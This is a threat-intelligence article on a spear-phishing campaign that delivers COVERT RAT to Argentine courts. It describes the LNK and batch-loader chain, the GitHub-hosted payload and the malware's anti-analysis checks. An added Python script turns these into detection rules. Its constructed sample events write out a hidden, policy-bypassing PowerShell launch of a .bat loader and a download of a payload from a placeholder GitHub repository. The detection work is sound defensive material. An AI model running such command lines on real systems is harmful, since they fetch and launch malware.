Argentina’s judicial system is under a sophisticated cyberattack, with threat actors now abusing legitimate court documents and GitHub repositories to deploy a potent Remote Access Trojan (RAT) known as COVERT RAT. This ongoing campaign, dubbed Operation Covert Access, is specifically targeting federal courts, legal professionals, government justice agencies, and academic institutions within the country.
The attackers are leveraging spear-phishing emails that masquerade as official communications from Argentine federal courts. These emails contain seemingly legitimate documents related to preventive detention reviews, a tactic designed to exploit the trust inherent in legal processes and bypass typical user caution. The ultimate goal is to gain persistent control over infected systems, granting attackers access to sensitive judicial data and infrastructure.
Operation Covert Access: A Multi-Layered Threat to Judicial Targets
Analysis by Point Wild, building on foundational research from Seqrite, has revealed the intricate nature of this attack. The campaign is not a simple, one-step intrusion but a meticulously crafted, multi-stage infiltration designed to remain undetected within institutional networks for an extended period. The COVERT RAT, built in Rust, offers attackers extensive control over compromised machines, enabling a range of malicious activities.
The implications of COVERT RAT’s capabilities are significant. Once operational, the malware establishes a connection to a command-and-control (C2) server, allowing attackers to issue encoded instructions. These instructions can facilitate everything from the exfiltration of sensitive files to the deployment of ransomware. The RAT’s modular design further enhances its threat, supporting credential harvesting, privilege escalation, encrypted file operations, and persistent re-access to victim systems.
A particularly concerning feature highlighted by researchers is the malware’s built-in cleanup functionality. This capability allows attackers to erase all traces of their presence upon completion of their objectives, severely complicating post-incident forensics and attribution efforts.
The Technical Execution: From Phishing to Persistent Access
The infection chain begins with a spear-phishing email delivering a ZIP archive. This archive contains three key components: a Windows shortcut (LNK) file designed to appear as a PDF, a batch loader script, and a convincing PDF decoy document that mimics genuine court rulings. When the user clicks the LNK file, a malicious script executes silently in the background, while the decoy PDF is displayed to maintain the illusion of legitimacy.
The shortcut file, often named something like “juicio-grunt-posting.pdf.lnk” and adorned with a PDF icon, triggers PowerShell in a hidden mode with the execution policy disabled. This immediately activates the batch loader script, identified as “health-check.bat.” According to security reports, this script then reaches out to a GitHub repository to download the primary RAT payload.
The use of GitHub as a delivery channel is a strategic choice by the attackers. Traffic directed to GitHub is less likely to raise immediate red flags at the network level, contributing to the stealthy nature of the operation. Once downloaded, the payload is executed via PowerShell’s `Start-Process` command and is masqueraded as “msedge_proxy.exe,” strategically placed within Microsoft Edge’s user data folder to blend in with legitimate system processes.
Before establishing a connection to its C2 server, the malware performs a series of environment checks. It queries system manufacturers using WMIC, scans the tasklist for reverse engineering tools like Wireshark, OllyDbg, and x64dbg, and inspects registry paths associated with virtualization software such as VMware, VirtualBox, and Hyper-V. It also scrutinizes the Process Environment Block (PEB) for active debuggers and employs timing-based analysis using `QueryPerformanceFrequency` to detect emulated environments. Only after passing all these checks does the RAT proceed to communicate with its C2 server and await further commands from the operators.
Recommendations for Enhanced Security
Given the targeted nature and sophisticated techniques employed in this campaign, security teams and individuals operating within judicial and legal environments are strongly advised to implement robust security measures. These include maintaining up-to-date antivirus software with real-time protection actively enabled and exercising extreme caution with email attachments, particularly from unverified senders or in compressed archive formats.
Users should refrain from clicking on suspicious links or downloading files from unofficial sources. Regular monitoring of running processes in Task Manager is also recommended to identify and investigate any unfamiliar entries, such as the deceptive “msedge_proxy.exe.” Furthermore, avoiding the installation of cracked or pirated software is crucial, as these are common vectors for secondary infections.
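As an added defender-side example, not code from Point Wild, Seqrite or the original article, the following Python script turns the observable details of the infection chain described above and the process-monitoring advice in this section into detection logic that runs over process-creation records. It goes a little beyond manual Task Manager inspection: besides flagging an “msedge_proxy.exe” running from Edge’s User Data folder, it also flags a hidden PowerShell launch that invokes a .bat loader and a script-spawned download from GitHub. The record schema (Sysmon Event ID 1 style fields), the sample command lines, the file paths and the GitHub repository name are all constructed or placeholder values, not indicators from the report.

```python
"""Detection rules for the Operation Covert Access chain (added example; sample data is constructed)."""
from __future__ import annotations

import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record. The field set mirrors Sysmon Event ID 1 (assumed schema)."""
    pid: int
    image: str          # full path of the newly created process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


# powershell.exe accepts abbreviated switches, so match both long and short forms.
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
POLICY_DISABLED = re.compile(r"-(ep|exec\w*)\s+(bypass|unrestricted)", re.I)
BAT_ARGUMENT = re.compile(r"\.bat\b", re.I)
GITHUB_HOST = re.compile(r"https?://(raw\.)?github(usercontent)?\.com/", re.I)
DOWNLOAD_VERB = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|downloadfile|downloadstring|start-bitstransfer", re.I
)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits: list[str] = []

    # Rule 1: hidden PowerShell with execution policy disabled that runs a .bat loader.
    # A double-clicked LNK usually shows explorer.exe as the parent, which is worth
    # recording as context but is not required for the match.
    if (
        basename(ev.image) in ("powershell.exe", "pwsh.exe")
        and HIDDEN_WINDOW.search(ev.cmdline)
        and POLICY_DISABLED.search(ev.cmdline)
        and BAT_ARGUMENT.search(ev.cmdline)
    ):
        hits.append("hidden_powershell_runs_bat")

    # Rule 2: a process spawned by cmd.exe (i.e. by a batch script) pulls a file from GitHub.
    if (
        basename(ev.parent_image) == "cmd.exe"
        and GITHUB_HOST.search(ev.cmdline)
        and DOWNLOAD_VERB.search(ev.cmdline)
    ):
        hits.append("script_downloads_from_github")

    # Rule 3: the masqueraded payload name running out of Edge's User Data folder.
    # A real deployment would also verify the binary's Authenticode signature.
    if basename(ev.image) == "msedge_proxy.exe" and "user data" in ev.image.lower():
        hits.append("msedge_proxy_in_user_data")

    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Run every rule over every event and return (pid, rule) pairs in event order."""
    return [(ev.pid, rule) for ev in events for rule in detect(ev)]


# Constructed sample records: three that follow the described chain, two benign.
SAMPLE_EVENTS = [
    ProcEvent(4101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& C:\Users\u\AppData\Local\Temp\health-check.bat"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(4102, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -NoProfile -Command "Invoke-WebRequest -Uri https://github.com/EXAMPLE-ORG/EXAMPLE-REPO/raw/main/payload.bin -OutFile C:\Users\u\AppData\Local\Temp\p.bin"',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(4103, r"C:\Users\u\AppData\Local\Microsoft\Edge\User Data\msedge_proxy.exe",
              r"msedge_proxy.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(4104, r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
              r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default',
              r"C:\Windows\explorer.exe"),
    ProcEvent(4105, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -Command Get-Date",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for pid, rule in scan(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
```

Each rule is deliberately narrow so that a legitimate Edge launch or an ordinary interactive PowerShell session produces no hit; tuning would consist of feeding real Sysmon or EDR process-creation events into `ProcEvent` and reviewing which of the three rules fire in the environment.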
The ongoing investigation into Operation Covert Access and the specific capabilities of COVERT RAT aims to provide a clearer picture of the threat landscape impacting Argentina’s judicial sector. The findings underscore the critical need for constant vigilance and adaptive security strategies to counter evolving cyber threats targeting sensitive governmental and legal infrastructure.